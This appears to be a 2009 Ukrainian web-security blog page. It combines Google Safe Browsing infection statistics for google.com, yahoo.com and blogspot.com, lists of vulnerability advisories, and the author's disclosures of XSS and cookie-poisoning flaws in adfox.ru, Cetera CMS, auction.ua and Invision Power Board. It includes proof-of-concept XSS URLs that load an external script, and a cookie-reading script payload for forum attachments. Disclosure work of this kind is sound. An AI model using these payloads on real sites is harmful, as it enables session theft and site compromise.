Websecurity - Веб безпека

Коли я виявив можливість використання Safe Browsing від Google для перевірки сайтів на інфікованість, першим ділом я провів діагностику декількох популярних веб сайтів. І я отримав доволі цікаві результати .

Серед найперших перевірених мною сайтів були google.com, yahoo.com та blogspot.com, які виявилися інфікованими (за останні 90 днів). Те, що blogspot.com (це один з доменів сервіса Гугла Blogger) виявився інфікованим, це мене не здивувало, бо я ще торік писав про те, що даний ресурс Google використовується для розповсюдження шкідливих кодів (по даним Sophos), а ось те, що сам google.com був інфікований, а також yahoo.com, це вже новина.

Діагностична сторінка Google Safe Browsing для google.com повідомляє про те, що:

Цей сайт наразі не входить до переліку підозрілих.

Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 разів протягом останніх 90 днів.

А також:

З 70146 сторінок, які ми перевірили на сайті протягом останніх 90 днів, з 4 сторінок без дозволу користувача було завантажено і встановлено зловмисне програмне забезпечення. Останнього разу Google відвідував цей сайт 2009-12-19, і підозрілий уміст був знайдений на цьому сайті 2009-12-16.

Malicious software includes 7 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Також інформація про те, що зловмисне програмне забезпечення присутнє в 14 доменах, що 7 доменів є посередниками поширення зловмисних програм серед відвідувачів сайта, а також:

За останні 90 днів сайт google.com був посередником зараження 10 сайтів, включаючи apostei.net/, www.jazaan.com.googlepages.com/, debsh2.mihanblog.com/.

Так що сайт Гугла був нещодавно інфікований (16.12.2009). Після чого він був очищений від інфекції, але факт залишається фактом.

Таким чином Information Leakage в даному сервісі Гугла призвела до витоку інформації про зараженність власного сайта. Це такий гумор у Гугла - оприлюднювати інформацію про інфікованість власних сайтів . З іншої сторони - це добре, що Гугл чесно це визнав.

Діагностична сторінка Google Safe Browsing для yahoo.com повідомляє про те, що:

Цей сайт наразі не входить до переліку підозрілих.

Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 2 разів протягом останніх 90 днів.

А також:

З 17710 сторінок, які ми перевірили на сайті протягом останніх 90 днів, з 15 сторінок без дозволу користувача було завантажено і встановлено зловмисне програмне забезпечення. Останнього разу Google відвідував цей сайт 2009-12-19, і підозрілий уміст був знайдений на цьому сайті 2009-12-13.

Malicious software includes 113 scripting exploit(s), 58 trojan(s), 8 exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine.

Також інформація про те, що зловмисне програмне забезпечення присутнє в 25 доменах, що 13 доменів є посередниками поширення зловмисних програм серед відвідувачів сайта.

Як видно, Yahoo пішов по стопам Гугла.

Діагностична сторінка Google Safe Browsing для blogspot.com повідомляє про те, що:

Цей сайт наразі не входить до переліку підозрілих.

Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 462 разів протягом останніх 90 днів.

А також:

З 2112321 сторінок, які ми перевірили на сайті протягом останніх 90 днів, з 19127 сторінок без дозволу користувача було завантажено і встановлено зловмисне програмне забезпечення. Останнього разу Google відвідував цей сайт 2009-12-19, і підозрілий уміст був знайдений на цьому сайті 2009-12-19.

Malicious software includes 21423 worm(s), 11635 trojan(s), 3186 scripting exploit(s). Successful infection resulted in an average of 16 new process(es) on the target machine.

Також інформація про те, що зловмисне програмне забезпечення присутнє в 3825 доменах, що 1592 домена є посередниками поширення зловмисних програм серед відвідувачів сайта, а також:

За останні 90 днів сайт blogspot.com був посередником зараження 23 сайтів, включаючи euroddl.com/, alfawarez.com/, ddlspot.com/.

А також:

Так, цей сайт поширював зловмисне програмне забезпечення протягом останніх 90 днів. Він заразив 9 домен(-ів), включаючи tisuituputih.blogspot.com/, enfermagemsu.blogspot.com/, elltoro.com/.

В даній добірці уразливості в веб додатках:

• HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS), Execute Arbitrary Code (деталі)
• HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS) (деталі)
• Vulnerabilities in squirrelmail (деталі)
• (GET var ‘member’) BLIND SQL INJECTION EXPLOIT FAMILY CONNECTIONS <= v1.9 (деталі)
• maxcms2.0 creat new admin exploit (деталі)
• Syhunt: A-A-S (Application Access Server) Multiple Security Vulnerabilities (деталі)
• AjaxTerm session id collision (деталі)
• (POST var ‘rating’) BLIND SQL INJECTION microTopic v1 Initial Release (деталі)
• Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit (деталі)
• Trend Micro Products Web Management Authentication Bypass (деталі)

31.07.2009

У грудні, 08.12.2008, я знайшов Cross-Site Scripting та Cookie Poisoning уразливості на проекті http://adfox.ru (банерна мережа). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.12.2009

Уразливості на домені https://login.adfox.ru.

XSS:

• alert(document.cookie)

Cookie Poisoning:

Можлива persistent XSS атака через Cookie Poisoning. При встановленні XSS коду в значенні кукіса amacsAccount, можна виконати код при кожному відвідуванні сторінки https://login.adfox.ru. Це можна зробити або через вищезгадану XSS дірку, або через дірки в браузерах.

Дані уразливості вже виправлені.

В даній добірці уразливості в веб додатках:

• Re: MicroWorld MailScan - Multiple Vulnerabilities within Admin-Webinterface (деталі)
• TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit (деталі)
• Vpopmail/QmailAdmin User’s Quota Multiple Integer Overflows (деталі)
• BLIND SQL INJECTION exploit (GET var ‘AlbumID’) RTWebalbum 1.0.462 (деталі)
• Claroline v.1.8.11 Cross-Site Scripting (деталі)
• HP OpenView Products Shared Trace Service Denial of Service (деталі)
• HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS) (деталі)
• MULTIPLE SQL INJECTION VULNERABILITIES Shutter v-0.1.1 (деталі)
• MULTIPLE CODE INJECTION VULNERABILITIES TUENTI SPAIN (деталі)
• activeCollab XSS and Full Path Disclosure (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах DM Albums та Google Analytics. Для котрих з’явилися експлоіти. DM Albums - це плагін для створення фото альбомів та галерей, Google Analytics - це плагін для інтергації з системою Google Analytics.

• Численні уразливості в WordPress DM Albums Plugin (деталі)
• Google Analytics plugin for Wordpress - XSS Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

29.10.2009

У березні, 01.03.2009, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі Cetera CMS. Які виявив на офіційному сайті системи http://www.cetera.ru.

Раніше я вже писав про уразливість в Cetera CMS.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

16.12.2009

Insufficient Anti-automation:

http://site/support/default.php?project=1

Відсутній захист від автоматизованих запитів (капча).

XSS:

http://site/support/default.php?project=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E
http://site/support/default.php?project=1&lang=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E
http://site/support/default.php?project=1&name=%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20%3E

Та через заголовки User-Agent, Accept-Language та Referer:

Уразливі Cetera CMS v2.9.0 та попередні версії. Розробники в себе на сайті на Cetera CMS виправили XSS уразливості, але не виправили Insufficient Anti-automation.

В даній добірці уразливості в веб додатках:

• Persistent XSS in Kayako Support Suite (деталі)
• Secunia Research: Trend Micro OfficeScan Directory Traversal Vulnerability (деталі)
• Sun Glassfish Enterprise Server - Multiple Linked XSS vulnerabilies (деталі)
• Sun Glassfish Woodstock Project - Linked XSS Vulnerability (деталі)
• MULTIPLE REMOTE VULNERABILITIES TemaTres 1.0.3 (деталі)
• BLIND SQL INJECTION EXPLOIT TemaTres 1.0.3 (деталі)
• IceWarp WebMail Server: SQL Injection in Groupware Component (деталі)
• IceWarp WebMail Server: Cross Site Scripting in Email View (деталі)
• IceWarp WebMail Server: User-assisted Cross Site Scripting in RSS Feed Reader (деталі)
• Apple’s Mail.app stores your S/MIME encrypted emails in clear text (деталі)

Нещодавно я писав про нові уразливості на auction.ua, де згадав про партнерський скрипт від auction.ua. Як я писав, даний партнерський скрипт реалізований таким чином, що домен сайта (основний домен) або його піддомен може бути зроблений як аукціон на движку auction.ua. Тобто він лише редиректить на головний сайт “під виглядом партнерського”. І відповідно всі дірки на головному сайті наявні й на партнерських сайтах.

І я перевірив деякі з раніше мною знайдених і оприлюднених уразливостей на auction.ua (зокрема Cross-Site Scripting), чи вони ще працюють, і чи вони працюють на партнерських сайтах.

XSS (IE):

Дана уразливість на auction.ua була виправлена погано ще в 2007 році. Спочатку її не виправили, а потім в 2007 році її виправили, але погано, і при невеликій модифікації коду вона знову працює.

• alert(document.cookie)
• цікавий

Вона працює на souvenirs.auction.ua та інших сайтах на піддоменах auction.ua:

• alert(document.cookie)

Але не працює у випадку, якщо сайт на окремих доменах: auction.shram.kiev.ua, auction.ukrop.com та ubuy.com.ua.

XSS (IE):

Серед уразливостей на aukcion.ua та auction.ua працює одна (хоча й редиректить на дещо інший URL).

• alert(document.cookie)
• цікавий

Та на партнерських сайтах:

http://souvenirs.auction.ua

• alert(document.cookie)

http://auction.shram.kiev.ua

• alert(document.cookie)

http://auction.ukrop.com

• alert(document.cookie)

http://ubuy.com.ua

• alert(document.cookie)

Всі веб сайти що базуються на движку auction.ua вразливі, так само як і головний сайт аукціону. А таких сайтів чимало (орієнтовно 295 партнерських сайтів).

Існують численні Cross-Site Scripting уразливості в Invision Power Board. Атака відбувається через атачмент (при кліку на атачмент в пості на форумі чи на лінку на даний атачмент). Це persistent XSS уразливості.

Про можливість атаки через swf-файли мені вже давно відомо. Тому я вже багато років тому відключив підтримку swf-файлів в атачментах (і в аватарах та фотографіях). Також я писав на початку 2008 про XSS уразливість в IPB через включені флешки і випустив виправлення для неї в своєму MustLive Security Pack.

В 2008 році була виявлена Cross-Site Scripting уразливість в IPB через htm і html файли в атачментах. Вона стосувалася Internet Explorer, в якому код виконувався в контексті сайта (в Mozilla і Firefox код виконувався локально). Але як я сьогодні перевірив, в Opera код також виконується в контексті сайта.

А нещодавно була виявлена нова XSS уразливість в IPB, цього разу через txt-файли. Яка стосується Internet Explorer. У випадку htm, html і txt-файлів (а також нищезгаданих php, rtf і xml-файлів) найкращим методом захисту від XSS є відключення їх підтримки на форумі (подібно до swf-файлів).

Сьогодні, 12.12.2009, я виявив нові Cross-Site Scripting уразливості в Invision Power Board. Атака відбувається через файли php, rtf та xml (в атачментах).

Можливі наступні атаки:

1. Атака через завантаження php-файлів з JavaScript кодом. Працює в IE та Opera в контексті сайта. В браузерах Mozilla та Firefox файл запускається локально (не в контексті сайта) при виборі відкрити в браузері. Відповідно у випадку атаки через htm, html та php файли на браузери Mozilla та Firefox, які відкривають їх локально (при виборі користувачем у діалоговому вікні), можлива атака на локальний компьютер користувача.

2. Атака через завантаження rtf-файлів з JavaScript кодом. Працює тільки в Internet Explorer.

3. Атака через завантаження xml-файлів з JavaScript кодом. Працює в Mozilla, Firefox, Opera та Chrome (але без доступу до кукісів).

XSS:

Для атаки через htm, html, php, rtf та txt-файли, потрібно зробити файл з наступним змістом (і завантажити в атачменті на форум):
<script>alert(document.cookie)</script>

Тестував на Invision Power Board 1.3 та 2.2.2. Уразливими повинні бути всі версії IPB 1.x (зокрема для txt), 2.x та 3.0.x. Автор advisory про атаку через txt-файли зазначав, що в IPB 3.0.4 є деяки фільтри проти XSS при завантаженні файлів, але їх можна обійти.

Перевірку провів в наступних браузерах: Internet Explorer 6 (6.0.2900.2180), Mozilla 1.7.x, Mozilla Firefox 3.0.15, Opera 9.52 та Google Chrome 1.0.154.48.

Виявлена Cross-Site Scripting уразливість в IPB. Це persistent XSS уразливість, що дозволяє розмістити txt-файл з атакуючим html кодом на сторінках форума.

Уразливі Invision Power Board 3.0.4 та попередні версії.

IPB задає такий MIME-тип для txt файлів, що при наявності в них html коду (наприклад атакуючого коду), він виконається в браузері IE. Уразливість працює при перегляді атачмента в Internet Explorer, але не в інших браузерах. Уразливість подібна до Cross-Site Scripting в Invision Power Board, але використовуються не html, а txt файли для атаки.

• IPB v2.x up to 3.0.4 XSS vulnerability (деталі)

Зазначу, що автор advisory заявляє, що в IPB для txt файлів заданий MIME-тип application/x-dirview. При цьому в мене на форумі (на IPB 2.2.2) для txt файлів був по замовчуванню заданий MIME-тип text/plain і атака працювала. Тому рекомендація автора встановити text/plain не є ефективною (а в IPB 1.x взагалі немає можливості встановити MIME-тип) і я раджу взагалі відключити підтримку txt файлів на форумі.